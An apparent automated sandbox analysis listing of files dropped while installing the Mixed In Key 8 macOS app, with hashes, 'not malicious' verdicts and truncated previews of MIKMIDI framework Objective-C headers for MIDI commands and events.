/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IhbC26 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	11025
Entropy (8bit):	4.9298049027249204
Encrypted:	false
SSDEEP:	192:hmVLjiUwso7uOif1WrTBl1AMQkBl1+tuMQBU/1dBD:hmVPiUwso3itW/9541d1
MD5:	1645CDF444D66F9DAA8DD3C076B80282
SHA1:	41F1D30DB988BD0AF411C73C3B8D39F2AB2380C8
SHA-256:	268F8ED3CC71FAA93EF81BB8338709686410DA25A3DD689AB2434C84B3C6F8BD
SHA-512:	E55E952BCCCDC6977CB31A9853C9C2CFD4C505B1617ED9A16C5B89A780DC5A4BE20E96ED00D9CB4BABEE6BFBEF16910C660C2ECB54ED579F2C4500A3A03A9C76
Malicious:	false
Preview:	//.// MIKMIDICommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"../*. Types of MIDI messages. These values correspond directly to the MIDI command type values. * found in MIDI message data.. . @note Not all of these MIDI message types are currently explicitly supported by MIKMIDI.. /.typedef NS_ENUM(NSUInteger, MIKMIDICommandType) {../* Note off command. /..MIKMIDICommandTypeNoteOff = 0x8f,../* Note on command. /..MIKMIDICommandTypeNoteOn = 0x9f,../* Polyphonic key pressure command. /..MIKMIDICommandTypePolyphonicKeyPressure = 0xaf,../* Control change command. This is the most common command sent by MIDI controllers. /..MIKMIDICommandTypeControlChange = 0xbf,../* Program change command. /..MIKMIDICommandTypeProgramChange = 0xcf,../* Channel pressure command. */..MIKMIDICommand

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Ikc5pY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2468
Entropy (8bit):	5.03894920776458
Encrypted:	false
SSDEEP:	48:wjH1NX6lPe8AiXGhyj+v1ilrO9ekB8fRo9soJeeMbc:wVNKlXIgcafsAo
MD5:	B65C485747B8C10983E6A34768A2B0AF
SHA1:	21BB4EDDFB3C6755BAD801050B6F3934643A742C
SHA-256:	DE6DE355AB7893A34BA9F9FD410B6D7F85A5F2DD1F4A4E05295004B48C5A6814
SHA-512:	0A6F23517628343B7502EA5EE617BD0031AED24DC55B6FDCF8ECAE9A68C3A4BB9CF8AEBB2398FA87D48A0C47533EDB16AF7767699A42CD53984B1AA3949B4BDB
Malicious:	false
Preview:	//.// MIKMIDIPlayer.h.// MIKMIDI.//.// Created by Chris Flesner on 9/8/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDIMetronome;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIPlayer can be used to play an MIKMIDISequence.. /.__attribute((deprecated("use MIKMIDISequencer instead"))).@interface MIKMIDIPlayer : NSObject../. Prepares the MusicPlayer for playback.. . Call this method in advance of playback to reduce a music player.s startup latency.. /.- (void)preparePlayback;../. Starts playback from the beginning of the music sequence. . * Equivalent to calling -startPlaybackFromPosition with a position of 0.. /.- (void)startPlayback;../. Starts playback of the music sequence from the specified position.. . @param position The MusicTimeStamp to begin playback from.. */.- (void)startPlaybackFrom

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JVmiIF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4363
Entropy (8bit):	5.023426222794968
Encrypted:	false
SSDEEP:	48:1XPzDZ2G7nNR9fxTZcnkG71ArOe7REPWKIpTePR8Kg2EAZNGuRKG8zOLgfT:VDZlnN7fx9UEyACPgX+1ReOLgL
MD5:	07DA1A11C9DB7F2BD423986729CF2047
SHA1:	6B76222005B0CD9F7F3C7D996C4E856C3CB7639E
SHA-256:	94E0F264A1F3E2A3DD0BBAB809A940899121AE6EBE39430AA25DC9C3920DE492
SHA-512:	346491A44CEDAFD7940D07446CCFBC9D8817419C03BDB795D52DB0A6CD4BB283F1EC56BE436EFB5A9AD9AAD2B1FA249B171B140DD5D7A0FE3B79B8EBE24B7EBE
Malicious:	false
Preview:	//.// MIKMIDIEventMIDINoteMessage.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIClock;..NS_ASSUME_NONNULL_BEGIN../*. A MIDI note event.. /.@interface MIKMIDINoteEvent : MIKMIDIEvent../. Convenience method for creating a new MIKMIDINoteEvent.. . @param timeStamp A MusicTimeStamp value indicating the timestamp for the event.. * @param note The note number for the event, from 0 to 127. 60 is middle C.. * @param velocity A number from 0-127 specifying the velocity of the note.. * @param duration The duration of the event in MusicTimeStamp units.. * @param channel The channel on which the MIDI event should be sent.. . @return An initialized MIKMIDINoteEvent instance, or nil if an error occurred.. */.+ (instancetype)noteEventWithTimeStamp:(MusicTimeStamp)timeStamp......... note:(UInt8)note......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JdrHcP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.91602138918715
Encrypted:	false
SSDEEP:	96:v/HxtMJuxQSdQ0Os7XtvOVgtCgbgLhPDqguLgHtSlp86zeFxrb:HH0JuGoNFO+vML9Fu8NSlOAI5
MD5:	423063FD68A31E7362C15118A8ADA353
SHA1:	EA1778AF3C89295FED40C0805D8AA739A7459D3E
SHA-256:	68821A1EA1B53918F244DEAA8BC9155BF907B96102065D5009FE786A5C170B5A
SHA-512:	85FDD70E99751D1E6A4187B70E09EBD67CEC6CC40AF452FED9BE48219BDB48219208CD2F0DA15FB38600D7D8E0C49D806D7EE87CF81B107A62479FC9C7D1B7B1
Malicious:	false
Preview:	//.// MIKMIDICommand_SubclassMethods.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDITransmittable.h"../*. These methods can be called and/or overridden by subclasses of MIKMIDICommand, but are not. * otherwise part of the public interface to MIKMIDICommand. They should not be called directly. * except by subclasses of MIKMIDICommand.. /.@interface MIKMIDICommand () <MIKMIDITransmittable>../. Registers a subclass of MIKMIDICommand. Registered subclasses will be instantiated and returned. * by +[MIKMIDICommand commandWithMIDIPacket:] and +[MIKMIDICommand commandForCommandType:] for. * commands they support.. . Typically this method should be called in the subclass's +load method.. . @note If two subclasses support the same command type, as determined by calling +supportedMIDICommandTypes. * which one is used is undefined.. . @param subclass A

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JwpEE6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	10420
Entropy (8bit):	4.793016401496391
Encrypted:	false
SSDEEP:	192:JTXCg+O0jl50tN6lc6Ohj/M9Dreljx9SF+XWiul:JOgjk/6N8c6KAIJoNiO
MD5:	D98404A464625D0503622C76CB315989
SHA1:	EA7431D2753CFC0025B947B46B27B518D4AF6BD1
SHA-256:	FD554A0C1C12F9174FC82197F2DEF51BBC2CCB287724721600FE5959B39A3939
SHA-512:	983B8DCBF5637F6D8C5526A240882DB5808B9D2205649EC81B02CFDEF31A285EA4192AE439129DCE50677F8FB551C76E03C0CFE904A96F93147CE0AA713335FC
Malicious:	false
Preview:	//.// MIKMIDIConnectionManager.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/5/15..// Copyright . 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h".#import "MIKMIDISourceEndpoint.h"..@class MIKMIDIDevice;.@class MIKMIDINoteOnCommand;..@protocol MIKMIDIConnectionManagerDelegate;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIConnectionManager can be used to manage a set of connected devices. It can be configured to automatically. * connect to devices as they are added, and disconnect from them as they are removed. It also supports saving. * the list of connected to NSUserDefaults and restoring them upon relaunch.. . The use of MIKMIDIConnectionManager is optional. It is meant to be useful in implementing functionality that. * many MIDI device enabled apps need. However, simple connection to devices or MIDI endpoints can be done with. * MIKMIDIDeviceManager directly, if desired.. */.@interface MIKMIDIConnecti

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_KGs4aE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	8030
Entropy (8bit):	4.835477134697957
Encrypted:	false
SSDEEP:	192:H0y+k9FQBb3+Hv+rMJsXQ//xhDVuih6iVrFTJuM:Uy+k9SBb3+Hv+rMJsXw/xhVuihvVrF9p
MD5:	B874DF0BFA106DE18D2CBA842CB9E840
SHA1:	92E9220F4B6A0908264091B6AD3F0E1924FA32AB
SHA-256:	0491C597D7D27BAD33123D9AC0E2E42BC510E438E3A135A984E63FC555F912D0
SHA-512:	3DF2AFC5BC799F0538D4A4C16EA57D220ADABFCC525928CD44E5B1D21E0E565CA25AF3D867D07ADB3CBB1AA52B0C9E72EF43D570447AD94908B3DEF773EF7AF5
Malicious:	false
Preview:	//.// MIKMIDIMappingManager.h.// Danceability.//.// Created by Andrew Madsen on 7/18/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#define kMIKMIDIMappingFileExtension @"midimap"..@class MIKMIDIMapping;..@protocol MIKMIDIMappingManagerDelegate;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIMappingManager provides a centralized way to manage an application's. * MIDI mappings. It handles both bundled (built in) mapping files, as well. * as user-customized mappings. It will automatically load both bundled and. * user mappings from disk. It will also save user mappings to an appropriate. * location on disk, providing an easy to way to support the ability to import user. * mappings to an applicaation.. . MIKMIDIMappingManager is a singleton.. /.@interface MIKMIDIMappingManager : NSObject../. Used to obtain the shared MIKMIDIMappingManager instance.. * MIKMIDIMappingManager should no

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_KNWeet Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1226
Entropy (8bit):	5.0237189853868465
Encrypted:	false
SSDEEP:	24:ZXmbOY15Fni6s6E9p1wz1BvoQ3Oab1BN1B4Lp/2FnoQ3iD:WOY1HZcp1whSQ3N52p2GQ3M
MD5:	615F075DBA9AFCA1A89B88E9391077F4
SHA1:	8DCDB3406E21DE496130DEAAE30ED4246985F3C9
SHA-256:	A84629CF3AF50211A2598BB1E7738067E2CA47B10325499904F930F00D93A182
SHA-512:	AC37F84627CEC8CA6FA426CD70DCABDCD5CA51E3CA26D42B30C4A0EF8A4CFEBB5EE24AC261968F2B75B1F42B7FC6FD46F20CD7B8A8F83C63F1691B7AA507BEAA
Malicious:	false
Preview:	//.// MIKMIDICommandThrottler.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIChannelVoiceCommand;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDICommandThrottler is a simple utility class useful for throttling e.g. jog wheel/turntable controls, . * which otherwise send many messages per revolution.. /.@interface MIKMIDICommandThrottler : NSObject../. Determine whether a command from a throttled control should be handled or discarded.. . @param command The command received from the throttled control.. * @param factor The throttling factor to apply. e.g. a value of 20 means that only 1 of every 20 messages should be handled.. . @return YES if the command should be handled, NO if it should be discarded.. /.- (BOOL)shouldPassCommand:(MIKMIDIChannelVoiceCommand )command forThrottlingFactor:(NSUInteger)factor;../**.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Lo7eHv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	765
Entropy (8bit):	5.138027559072134
Encrypted:	false
SSDEEP:	12:ZNTRxjhtqbu05vnzeUEjsWTR2G2VT/TS5f+N0mnUFbbTRt7MquPxhqRIp8d1AAjm:ZNzjhtYl5KUEjsWsv1TS5f+N0mUF/HvU
MD5:	3084D2EE5B41103394046F6AD0036237
SHA1:	6CBC3C26194110930D10726B72702488075ABBD9
SHA-256:	4781FDD494E46449609238F31D976AAF8EA6ED36A1579FCEC7AB245BFB8DCFD6
SHA-512:	0D5F4479DAA4ADCC36C34AA451C558799677F84FC6CE2E6E0843CA5424FFB1103CD329C3BD43B8B0D44D77A31CA39B4A95552CAD71B22E7AB5A7807B71BC92E6
Malicious:	false
Preview:	//.// MIKMIDIOutputPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIPort.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;.@class MIKMIDIDestinationEndpoint;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIOutputPort is an Objective-C wrapper for CoreMIDI's MIDIPort class, and is only for destination ports.. * It is not intended for use by clients/users of of MIKMIDI. Rather, it should be thought of as an. * MIKMIDI private class.. /.@interface MIKMIDIOutputPort : MIKMIDIPort..- (BOOL)sendCommands:(MIKArrayOf(MIKMIDICommand ) )commands toDestination:(MIKMIDIDestinationEndpoint )destination error:(NSError **)error;..@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MKgOxN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1687
Entropy (8bit):	5.016018925441187
Encrypted:	false
SSDEEP:	24:ZD/YYow3t00F/rVycB1XnV+HMsEFuiEodgj1ZOk:h/YY300FjPBesNF/Eodgj5
MD5:	A03F402D1747A1122F83C4B17BE9EF71
SHA1:	6F4A917BEA46831A32A0105FB6E93DC6FC4681D3
SHA-256:	2D6BC8B56F17FE30FE85AF0253F44824EB77505201B29D13472C4256020CFBF6
SHA-512:	BBDC4A4C209F969E5EC5B64A726E237D422EE1D8E7C909972A3D23148816340018CC77B721E1816974FEC4E214809881B3C30C8A96A065BD955A12B67C40666B
Malicious:	false
Preview:	//.// MIKMIDIChannelVoiceCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIChannelVoiceCommand is used to represent MIDI messages whose type is. * any of the channel voice command subtypes. Specific support for channel voice command. * subtypes is provided by subclasses of MIKMIDIChannelVoiceCommand (e.g.. * MIKMIDIControlChangeCommand, MIKMIDINoteOnCommand, etc.). /.@interface MIKMIDIChannelVoiceCommand : MIKMIDICommand../. The MIDI channel the message was or should be sent on. Valid. * values are from 0-15.. /.@property (nonatomic, readonly) UInt8 channel;../. The value of the command. The meaning of this property is. * different for different subtypes. For example, for a control change command,. * this is the controllerValue. For a note on command, this is the. * velocity.. *

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Nfma0u Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.079225811007229
Encrypted:	false
SSDEEP:	12:Z7GXzbPbFQRvnPvsyfynIkn4/kuidmrxCGXp1eQr9ZVw+X3SAFNGX+vwGXp17GXI:Zubj+3EyaIy4/kuidmrxN1/nigDwI1Iw
MD5:	70BFB0AF7CD64A5AD41596B29027FE87
SHA1:	3568B5B05E20D630A5C8BC9DAC45F3E157C9A1BC
SHA-256:	CC13C4E9F9104EA8E506BBB5BE682709CEB1DC0510A30086CDA4753F17541BA0
SHA-512:	3DE3F475DF1F7154968FF4DAF636C239E5018549CD72B48A779DF2B0277B0EA3CFF45D70B51FF3ABFD3EE955626BBC551B54515B77D36D74D115BE13805A787A
Malicious:	false
Preview:	//.// MIKMIDIProgramChangeCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 1/14/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI program change message.. . Program change messages indicate a change in the patch number.. * These messages can be sent to to a MIDI device or synthesizer to. .change the instrument the instrument/voice being used to synthesize MIDI.. /.@interface MIKMIDIProgramChangeCommand : MIKMIDIChannelVoiceCommand../*. The program (aka patch) number. From 0-127.. /.@property (nonatomic, readonly) NSUInteger programNumber;..@end../. The mutable counterpart of MIKMIDIProgramChangeCommand. */.@interface MIKMutableMIDIProgramChangeCommand : MIKMIDIProgramChangeCommand..@property (nonatomic, readwrite) UInt8 channel;.@property (nonatomic, readwrite) NSUInteger value;..@property (nonatomic, readwrite) NSUInteger pr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_OnFab0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.11368378091881
Encrypted:	false
SSDEEP:	12:ZhYCUNXbwY8vnPvohlvZABYIhYLYoUXLphXeSAF7YaYIhYrEKT3SsjQz8R86:ZhzMw73Ah1ZwzhQAg71zh+N
MD5:	AFF05A304F4027AC9F3EA2B8682E80E5
SHA1:	46CCA28912774967CCFD21367165AEDDF4DEC9D0
SHA-256:	DEF3814B5E79729BF36853A83FDBAF1C856580BA664C28FEC5111DE6A380CB2C
SHA-512:	1EDCC67420327AAB829B7945404F7314FD59492E541E390D0D3E6C25DF067F49626CB15178D340FF69834A97E507EA85BFCE1641726AC26332412DE6B2E94E49
Malicious:	false
Preview:	//.// MIKMIDIMetaTrackSequenceNameEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing a track name.. /.@interface MIKMIDIMetaTrackSequenceNameEvent : MIKMIDIMetaTextEvent..- (instancetype)initWithName:(NSString )name timeStamp:(MusicTimeStamp)timeStamp;..@property (nonatomic, readonly, nullable) NSString name;..@end../. The mutable counterpart of MIKMIDIMetaTrackSequenceNameEvent. /.@interface MIKMutableMIDIMetaTrackSequenceNameEvent : MIKMIDIMetaTrackSequenceNameEvent..@property (nonatomic, copy, readwrite, nullable) NSString name;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) UInt8 metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;.@property (nonatomic, copy, readwrite) NSSt

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Pdd9W1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3690
Entropy (8bit):	5.108001426228527
Encrypted:	false
SSDEEP:	48:L8q31H2u79zMqGul94ob6mgAlZ+QPLM0d74obHds:gGWK3rgoPrdjLG
MD5:	5FDCB879519F603F2D3F313D95D3BC0B
SHA1:	B7D97A8EE6B4668B7D50D06AC63BB6E6B882B189
SHA-256:	0194552261A28A04AAA1B12E998A5B235599F6C1D97ACA0A23A7B945DE070F5D
SHA-512:	D8A42D748624B17AF14E20FBE2A45018EBAF31B2446831B93CB8FBE98388BE37F93ADFABAD122226FB815D9589EA733DCBBB71EE30C74BFEFA6A2F120031FA4D
Malicious:	false
Preview:	//.// MIKMIDIMetaKeySignatureEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/23/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..typedef NS_ENUM(int8_t, MIKMIDIMusicalKey) {..MIKMIDIMusicalKeyCFlatMajor = -7,..MIKMIDIMusicalKeyGFlatMajor,..MIKMIDIMusicalKeyDFlatMajor,..MIKMIDIMusicalKeyAFlatMajor,..MIKMIDIMusicalKeyEFlatMajor,..MIKMIDIMusicalKeyBFlatMajor,..MIKMIDIMusicalKeyFMajor,..MIKMIDIMusicalKeyCMajor,..MIKMIDIMusicalKeyGMajor,..MIKMIDIMusicalKeyDMajor,..MIKMIDIMusicalKeyAMajor,..MIKMIDIMusicalKeyEMajor,..MIKMIDIMusicalKeyBMajor,..MIKMIDIMusicalKeyFSharpMajor,..MIKMIDIMusicalKeyCSharpMajor,....MIKMIDIMusicalKeyAFlatMinor = MIKMIDIMusicalKeyCFlatMajor+100,..MIKMIDIMusicalKeyEFlatMinor,..MIKMIDIMusicalKeyBFlatMinor,..MIKMIDIMusicalKeyFMinor,..MIKMIDIMusicalKeyCMinor,..MIKMIDIMusicalKeyGMinor,..MIKMIDIMusicalKeyDMinor,..MIKMIDIMusicalKeyAMinor,..MIKMIDIMusicalKeyEMinor,..MIKM

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Q4V1Tr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1243
Entropy (8bit):	5.084282715173978
Encrypted:	false
SSDEEP:	24:Zm2y/bdcB3ORSVV1a2497vREPIgi2oS24m2zEvq:MCQSVT67REQgUqEC
MD5:	9566A86B1B76618BFF676EF5D23771F8
SHA1:	D84B92870600A80322AF5CA661CC12A632473762
SHA-256:	471C294B8B9D45A7412A6EF882E9B042607732867717FB5E1F22DA10046B2537
SHA-512:	EC4FA99D4E6B0B8388AA6BAE1831CF411EF98C11459382773F72E6BE5754F1BD65A0B0E375375B250CAD66D7B5C2407E55B42D5B8E67306F1C12789F97BC1AA4
Malicious:	false
Preview:	//.// MIKMIDIPolyphonicKeyPressureEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A polyphonic key pressure (aftertouch) event.. . This event most often represents pressing down on a key after it "bottoms out".. /.@interface MIKMIDIPolyphonicKeyPressureEvent : MIKMIDIChannelEvent../. The MIDI note number for the event.. /.@property (nonatomic, readonly) UInt8 note;../. The pressure of the event. From 0-127.. /.@property (nonatomic, readonly) UInt8 pressure;..@end../. The mutable counter part of MIKMIDIPolyphonicKeyPressureEvent. */.@interface MIKMutableMIDIPolyphonicKeyPressureEvent : MIKMIDIPolyphonicKeyPressureEvent..@property (nonatomic, readwrite) UInt8 note;.@property (nonatomic, readwrite) UInt8 pressure;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_RJiba4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1476
Entropy (8bit):	5.028574377010233
Encrypted:	false
SSDEEP:	24:ZXe/blB3A5B00rikFZE57t6nH5/6nfJgDjXFHWfx:clkW0rPYcofJg92fx
MD5:	00FDCE29ED08960C5F910248887DA01E
SHA1:	4DE6A03C36BE1F1895181A13C4628E09CCF77A37
SHA-256:	EE6DFE9EAD7FC4045EA8850175297237FEE884DDEA0A17F003BD85557F7CF46C
SHA-512:	1531C4CBE9A6D6B0FD2B7DA30DA52075470E263D4C918012AEFCC61DEDC1FDEE19FB8BC1E7FE95F5C8D5DB96899763BF2E5D31394546103183CC6E0CD513A357
Malicious:	false
Preview:	//.// MIKMIDIControlChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. Control change events are typically sent when a controller value changes. . * Controllers include devices such as pedals and levers.. . This event is the counterpart to MIKMIDIControlChangeCommand in the context. * of sequences/MIDI Files.. /.@interface MIKMIDIControlChangeEvent : MIKMIDIChannelEvent../. The MIDI controller number for the event.. * Only values from 0-127 are valid.. /.@property (nonatomic, readonly) NSUInteger controllerNumber;../. The value of the controller specified by controllerNumber.. * Only values from 0-127 are valid.. /.@property (nonatomic, readonly) NSUInteger controllerValue;..@end../. The mutable counter part of MIKMIDIControlChangeEvent. */.@interface MIKMutableMIDIControlCha

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_RfQIr0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	5.0795987755393615
Encrypted:	false
SSDEEP:	12:Ze72/bdObFxlvnPvkQR3BWSnWXm9yUJNhBKs7sexH9M+flSAFq7D7se7RSsYhKTX:ZX/bdcB3VR3p2mkUrKp+Igz0
MD5:	0CAEDCD6B05EB67809ECA3053164F534
SHA1:	7275A925F93AC76A5E5D34640A44B5BF9D295D55
SHA-256:	BC6FA79C92180B4AA700C78D7B83020762445AB2EF49B4754900333CCAC223D8
SHA-512:	E63BFAE56C8638D34A1FDF9D034830F7CFF553B4B9E20CC23C4354F5780037B0CCF46132663ACF50D12D1E15381556EC7493006B061EE71419D765E3AEE83D2B
Malicious:	false
